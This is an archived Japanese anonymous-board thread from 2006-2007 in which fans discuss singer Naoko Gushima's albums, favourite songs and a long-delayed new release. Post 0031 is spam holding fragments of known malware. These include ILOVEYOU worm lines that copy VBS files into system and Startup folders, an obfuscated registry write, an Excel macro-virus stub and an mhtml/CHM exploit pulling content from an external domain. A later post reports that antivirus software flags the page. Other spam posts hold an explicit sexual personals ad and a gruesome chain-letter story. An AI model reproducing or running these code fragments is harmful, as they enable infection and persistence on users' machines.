X



具島直子

■ このスレッドは過去ログ倉庫に格納されています
0001名無しの歌姫
垢版 |
2006/02/10(金) 04:11:17ID:ixwqfIf+
一体どうしているのかと心配していましたが、
HPも再開され、新譜も出る!
祝・活動再開!ってことで、彼女の今までと今後を語り合いましょう。
0002名無しの歌姫
垢版 |
2006/02/10(金) 04:13:04ID:ixwqfIf+
活動再開っていうか、地道に色々やってらしたんですけどもね・・・w
失礼なこと書いてしまった。
0003名無しの歌姫
垢版 |
2006/02/10(金) 04:34:55ID:Czwrqd3S
具島直子のスレはたまに立つが
すぐに落ちちゃうので
きちんと保守するように >>1
0004名無しの歌姫
垢版 |
2006/02/12(日) 01:41:10ID:E6DmqBxx
> きちんと保守するように
なにこのえらそうなひと
0005名無しの歌姫
垢版 |
2006/02/13(月) 04:27:06ID:f4ypBop7
ほしゅ
0006名無しの歌姫
垢版 |
2006/02/17(金) 02:37:00ID:7ijAA90r
発売されるまでほしゅ
0009名無しの歌姫
垢版 |
2006/02/20(月) 18:58:10ID:Qw7TbDgC
おお、忘れかけたところで活動再開か。
今のところコンピ盤でのカバー曲が最新音源だったね。
新作楽しみ。
0010名無しの歌姫
垢版 |
2006/02/27(月) 03:33:43ID:mKZwsMyo
ほしゅ
0011名無しの歌姫
垢版 |
2006/03/04(土) 09:26:20ID:HSW2Bu6M
MissGがお気に入りで未だによく聴いてます。メロディが一番好きっす。
0012名無しの歌姫
垢版 |
2006/03/10(金) 02:52:50ID:bhbCFOBP
Sundayが好き
0013名無しの歌姫
垢版 |
2006/03/20(月) 06:16:21ID:wgsJ608u
ほしゅ
0016名無しの歌姫
垢版 |
2006/04/08(土) 09:30:36ID:ABIdLBMc
あげてないしw
0017名無しの歌姫
垢版 |
2006/04/10(月) 11:33:29ID:fk9peWSN
このあいだiTMSで買いそびれていたアルバムを見つけたんで買っちゃった。
引退して普通のおばちゃんになっているのかと思ってた。
0018名無しの歌姫
垢版 |
2006/04/16(日) 22:19:53ID:Dm4TzDWS
うえのたいら
0019名無しの歌姫
垢版 |
2006/04/16(日) 23:14:55ID:UIfdWDO1
松尾潔経由で知ったのかな?
1stが好きでよく聴いてました。
0020名無しの歌姫
垢版 |
2006/04/29(土) 02:41:25ID:o4Mvz/pl
tell me oh mama
教えてあの日の出来ごと

セカンドが最高傑作
0021名無しの歌姫
垢版 |
2006/05/06(土) 06:26:37ID:rNbOMBDQ

その曲大好き!
0022名無しの歌姫
垢版 |
2006/05/06(土) 07:04:55ID:YGJQ0oYG
いいよね
0024名無しの歌姫
垢版 |
2006/05/16(火) 14:02:58ID:azRt8q/W
具あげ
0025名無しの歌姫
垢版 |
2006/06/02(金) 11:54:20ID:pT7zwbIW
あげ!
0026名無しの歌姫
垢版 |
2006/06/02(金) 13:17:36ID:g2hZK+XS
レコーディングはどうなってるんだろう?
6月には発売しているかと当初思ったのに、もう6月だよ……。
サイトに全然上がらないねー。
0027名無しの歌姫
垢版 |
2006/06/05(月) 05:46:24ID:Cr/PQea4
>>26
今サイトを見て、同じようなこと書こうと思って来たよ。
待ち遠しいなー。
0028名無しの歌姫
垢版 |
2006/06/15(木) 14:33:52ID:0QL/s9ZK
保守支援
0029名無しの歌姫
垢版 |
2006/06/19(月) 12:29:52ID:LnokdmdG
ほしゅ
0030名無しの歌姫
垢版 |
2006/06/24(土) 20:50:05ID:4o3MkHxe
171*86*40 坊主、口ひげ、六尺常用、都内在住
汗臭ぇ体に臭ぇ六尺締め込んで、親方舎弟みてぇなノリでサカり合いたいぜ!
六尺一丁に地下足袋の格好で強制センズリ、野郎臭ぇ装束の格好のまま体ぶつけ合ったり
そんな事してぇぜ
舎弟根性入ってるヤツのみ連絡くれや

0031名無しの歌姫
垢版 |
2006/07/01(土) 23:19:34ID:cYIKFouX
<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm"; type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
???
0032名無しの歌姫
垢版 |
2006/07/02(日) 00:35:42ID:GsAMDbFs
たまには具島直子を聞いてみて下さいませ(*^−^)ノ
0033名無しの歌姫
垢版 |
2006/07/02(日) 01:25:19ID:1By8MLwL
「九月の海」がいい!
0034名無しの歌姫
垢版 |
2006/07/06(木) 21:57:38ID:Hq1gpzxq
アげ
0035名無しの歌姫
垢版 |
2006/07/10(月) 23:18:29ID:IGgOAQNs
0038名無しの歌姫
垢版 |
2006/08/15(火) 10:27:27ID:1nVoYCEk
奇形児を見たことはありますか? これは北海道の網走市であった話です。
古塚美枝さん(当時23) は、いわゆる売春婦でしたが夫がいました。
しかしその夫は働こうとせず、酒に溺れる毎日、そして酔うと必ず美枝さんに
暴力を振るいました。83年の夏、美枝さんは体調を崩し病院へ行きました。
原因は妊娠によるつわりなどでした。売春婦であった美枝さんは、
まず誰の子なのか考えましたが夫の子である事を確信し、
早く報告しようと急いで帰りました。しかし夫は自分の子とは信じず、
中絶を命じました。 それから5ケ月。結局美枝さんは中絶を拒み、
生むことを決意しましたが、夫は従わなかった事を不満に思い、
さらに暴力を振っていました。 そしてその日夫は美枝さんの腹部に
膝蹴りをしました。する と、美枝さんの股間からは溢れる様に血が流れてきました。
そして美枝さんは崩れ落ち、声にもならない 様なうめき声で唸りながら
........流産でした。夫は慌てて家を飛び出して行きました。何故?
それは生まれてきた子供が余りにも醜かったからです。目はあべこべに付き、
片方の目は眉毛の上に付いていました。鼻はだらしなく直角に曲がり、
口なんぞは縦向きに、しかも耳のつけねから裂け目の 様に付いていました。
動きもせず、ただこちらを眺めていました。 それからどうなったかは分かりません。
ただ、この話を聞いた人は最低3日間気を付けてください。
うしろで何か気を感じても振り向いて いけません。
それはあの子があなたを眺めているから。 10分以内にこれを
掲示板の5箇所に貼らなければそのままあの子は離れて行きません。
0039名無しの歌姫
垢版 |
2006/08/16(水) 20:11:35ID:XvipbdD+
あげ
0040名無しの歌姫
垢版 |
2006/08/24(木) 08:14:47ID:UOn5/HzH
9月の海って名曲だよね
シングルにしか入ってないのが惜しい
0041名無しの歌姫
垢版 |
2006/08/28(月) 08:28:12ID:97Ql8ffR

0042名無しの歌姫
垢版 |
2006/09/03(日) 16:25:10ID:pQiwy3BK
少し高くなった空から降る
光が染めてゆく波を見たら
心のなにもかもを
捨ててしまいたくなった
0043名無しの歌姫
垢版 |
2006/09/08(金) 15:58:52ID:hi9q5RrU

0044名無しの歌姫
垢版 |
2006/09/09(土) 19:36:28ID:QYwpCPYS
「今を生きる」すき
0045名無しの歌姫
垢版 |
2006/09/09(土) 19:56:46ID:BDILZZhr
99年の秋頃、自分の住んでいる地域のラジオ番組で
具島直子の特集をやっていたのを聴いて興味が募り
その後アルバムを買ったことがあった。
僕は邦楽のCDは、ここ10数年で4,5回しか買ってこなかったけど
このアルバムは全くハズレが無かった。
この時の番組は今でも聴くことがある程。
0046名無しの歌姫
垢版 |
2006/09/12(火) 04:32:47ID:t423FLqC
ラジオ聴きたいな
0049名無しの歌姫
垢版 |
2006/09/17(日) 17:14:29ID:5/8zFPAL
コンピでCandy知って、その超名曲っぷりに感動して「miss.G」購入したんですけど
どれも良い曲ですね

台風の夜が好きです
0050名無しの歌姫
垢版 |
2006/09/18(月) 10:03:22ID:QbnHx2ZF
age
0052名無しの歌姫
垢版 |
2006/09/22(金) 21:03:49ID:391paAIj
sage
0053名無しの歌姫
垢版 |
2006/09/25(月) 08:29:47ID:qoXgbwYe
>>49
miss.Gいいよね。

個人的に、女性ボーカリストの所持アルバムの中で一番、聴いてて気分良い。
0054名無しの歌姫
垢版 |
2006/09/26(火) 23:01:00ID:m21ftzPQ
俺は前にちょっと手術したことがあって、
本当にしんどいときは音楽なんて聴けないもんだけど、
この人の曲はなぜか気持ちよくて聴けたんだよね。
0056名無しの歌姫
垢版 |
2006/10/05(木) 03:36:47ID:Qt936UnA
1st2ndばっか聴いてて、3rdは買った時にちょろっと聴いただけでその後殆ど聴いてなかった。
久々に出してきて聴いてみたら、いいじゃん!何が気に入らなくて聴いてなかったんだろう。
我が事ながらわからない。へんなの。
0057名無しの歌姫
垢版 |
2006/10/20(金) 08:04:29ID:RfwNCGaK
ヽ( ´ー`)ノ
0058名無しの歌姫
垢版 |
2006/10/29(日) 18:28:05ID:WYc+0TFm
ここ、まだ生きてたんだ…感動した
0060名無しの歌姫
垢版 |
2006/11/01(水) 08:20:24ID:ToeO0H6v
いつ出るのかな〜
0061名無しの歌姫
垢版 |
2006/11/19(日) 03:27:54ID:0FEMl8Ev
さがりすぎ
0062名無しの歌姫
垢版 |
2006/11/21(火) 02:50:54ID:UuV5nh/7
ずっと気になってたんだけど、10年前位かな?
TBSドラマ(日曜21時の時間帯?)で必ず流れてたCMソングの
タイトル教えて下さい!

この木何の木、気になる木〜♪もこの時間帯でしたよね?
このCM好きだったなwwwww
0063名無しの歌姫
垢版 |
2006/11/21(火) 02:57:21ID:VgHGWcy1
>>62
な〜みだをひ〜とつぅ〜こーぼしてい〜たらぁ〜 ってやつかなあ?
それだったら、「Love Song」だよ。
この曲が具島さんを聴くきっかけになりました。
0064名無しの歌姫
垢版 |
2006/12/07(木) 01:45:52ID:aUgvI0SY
>>63さん
ありがとうございます!
Quiet Emotionゎ持っているんですが、
その曲は入ってないので中古で探してみますwwwwwwwww
0066名無しの歌姫
垢版 |
2006/12/31(日) 13:08:37ID:TQFzlQtD
ここに来る方は恐らく知っているでしょうけど
モウ具島ネタとしては古いですけど・・・・
短くても、何度でも聴きたくなる

http://www1.kyuden.co.jp/view.php?pageId=3069 
ここの 『くらしの夢編』

この唄声聞いて、心洗われちゃいましょう
0067名無しの歌姫
垢版 |
2007/01/22(月) 00:33:16ID:C3UN4QaP
>>66
元歌は嫌いだけど、この曲調、この歌声だと聞けるなあ。
今にわかったことではないけど、アレンジと歌手で大きく変わっちゃうもんだなと、あらためて思った。
0068名無しの歌姫
垢版 |
2007/01/27(土) 00:03:44ID:5xC38Ph4
空上げ御免
0069名無しの歌姫
垢版 |
2007/02/07(水) 04:00:30ID:WFQwygRd
さがりすぎ
0070名無しの歌姫
垢版 |
2007/02/24(土) 03:20:54ID:IRRIwS+G
やばす
0071名無しの歌姫
垢版 |
2007/02/24(土) 11:26:27ID:2GwmRw1l
てゆうか、ほんとに活動してるのかしら。
0072名無しの歌姫
垢版 |
2007/02/26(月) 02:12:25ID:CI8St7cO
そんなみもふたもないことを・・・w
0073名無しの歌姫
垢版 |
2007/03/12(月) 07:21:37ID:e+zqVe55
ほしゅage
0074名無しの歌姫
垢版 |
2007/03/22(木) 12:54:35ID:Lv43Yc+V
0075名無しの歌姫
垢版 |
2007/04/01(日) 04:06:08ID:eQzAoYUj
直子タン、美人なのに指は面白い形だねw
0076名無しの歌姫
垢版 |
2007/04/03(火) 03:18:59ID:YKbqshmE
i tunesでcandy落としました!やっぱこの曲いいね?地味に残りそうな曲だ。
0077名無しの歌姫
垢版 |
2007/04/30(月) 03:50:39ID:ByZCr0NV0
ヤバス
0078名無しの歌姫
垢版 |
2007/05/01(火) 01:14:31ID:aWfCOYfy0
もう38歳かぁ。。年経つの早いな。。

>>53
俺もmiss.Gは無人島にも棺桶にも持ってきたいほどの名盤。
0079名無しの歌姫
垢版 |
2007/05/07(月) 01:42:15ID:psvRFrYt0
うんうん。
0080名無しの歌姫
垢版 |
2007/05/09(水) 19:03:08ID:SbjleS/p0
ttp://www.tsutaya.co.jp/item/music/view_m.zhtml?pdid=20064578

ミルクティーめちゃいい曲。。
セルフカバーきぼんぬ。
0081名無しの歌姫
垢版 |
2007/05/12(土) 23:41:55ID:ULcaj7Lq0
「9月の海」も具島バージョンのほうが10倍いいしな
0082名無しの歌姫
垢版 |
2007/05/18(金) 02:08:23ID:BpqX+j5s0
このスレを開くとExploit.HTML.Mhtが入ってるってカスペに言われる。
どうしたらいいの
0084名無しの歌姫
垢版 |
2007/05/23(水) 18:52:11ID:v0X6g9iX0
>>83
ありがとう。

それにしても新譜、随分時間がかかってるね。いつになることやら・・・。
0085名無しの歌姫
垢版 |
2007/05/24(木) 21:02:58ID:c3vfjbnb0
インディーで出すのかな?
今年中に出ればおkだと思ってマターリ待ってます。
0086名無しの歌姫
垢版 |
2007/05/28(月) 20:31:23ID:0o7eU5Ba0
Quiet Emotionに入ってる「Sunday」という曲は
ジャニスイアンの名曲「17歳の頃」とそっくり。
嘘だと思ったら聞き比べてみ。
パクリだってわかるから。
0088名無しの歌姫
垢版 |
2007/06/12(火) 07:12:29ID:zH5tHW2J0
もはようございます
0089名無しの歌姫
垢版 |
2007/06/16(土) 23:30:56ID:UAhuSG0iP
新譜でないの?
0090名無しの歌姫
垢版 |
2007/06/17(日) 09:35:01ID:3wUPNYdn0
でるでる詐欺だな
0091名無しの歌姫
垢版 |
2007/06/19(火) 10:13:25ID:0Tl5rf+00
0092名無しの歌姫
垢版 |
2007/06/23(土) 01:56:50ID:urHAeOEi0
グッシーって呼んでる人キッツイねwww
ニックネームなんかは似合わない、
〜さんとさん付けしたいような方だと個人的には思うんだけど。
0093名無しの歌姫
垢版 |
2007/06/26(火) 13:12:20ID:Q8iOeLq/0
なるほどそういわれてみると。
しっとりした感じの美人だから、グッシーという語感は似合わないw
0095名無しの歌姫
垢版 |
2007/07/12(木) 03:53:32ID:2PqzDQ1X0
あげとく
0098名無しの歌姫
垢版 |
2007/07/18(水) 19:06:33ID:cuIpJQKX0
>>97
ちと寒いオヤジの書き込みだね?w

でも、人を癒す力があるって言葉には同意しとこう。
0099名無しの歌姫
垢版 |
2007/07/31(火) 19:24:19ID:aHYeD+LbP
冷え性なのね
0101名無しの歌姫
垢版 |
2007/08/14(火) 18:21:49ID:39DEQHu50
山梨英和大学のCM、ようつべ辺りにキボンヌ
■ このスレッドは過去ログ倉庫に格納されています

ニューススポーツなんでも実況